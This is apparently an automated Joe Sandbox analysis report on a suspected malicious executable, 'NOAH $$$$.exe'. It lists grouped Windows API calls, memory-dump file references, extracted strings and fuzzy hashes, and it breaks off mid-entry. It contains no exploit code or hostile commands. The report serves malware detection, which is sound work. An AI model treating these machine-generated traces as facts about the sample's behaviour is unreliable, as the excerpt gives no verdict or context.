                                                                                                                                        • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3771399671-0
                                                                                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                        • API String ID: 0-1603158881
                                                                                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                        APIs
                                                                                                                                        • CreateMenu.USER32 ref: 00448603
                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 161812096-4108050209
                                                                                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\NOAH $$$$.exe), ref: 00434057
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                        • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\Desktop\NOAH $$$$.exe, xrefs: 00434040
                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                        • API String ID: 3648134473-2838286901
                                                                                                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                                                                                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                        • Opcode Fuzzy Hash: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                                                                                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NOAH $$$$.exe,0040F545,C:\Users\user\Desktop\NOAH $$$$.exe,004A90E8,C:\Users\user\Desktop\NOAH $$$$.exe,?,0040F545), ref: 0041013C
                                                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 978794511-0
                                                                                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$_memcmp
                                                                                                                                        • String ID: '$\$h
                                                                                                                                        • API String ID: 2205784470-1303700344
                                                                                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                        Strings
                                                                                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                        • API String ID: 2441338619-1568723262
                                                                                                                                        • Opcode ID: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                                                                                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                        • Opcode Fuzzy Hash: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                                                                                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                        • String ID: @COM_EVENTOBJ
                                                                                                                                        • API String ID: 327565842-2228938565
                                                                                                                                        • Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                        • Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                        APIs
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
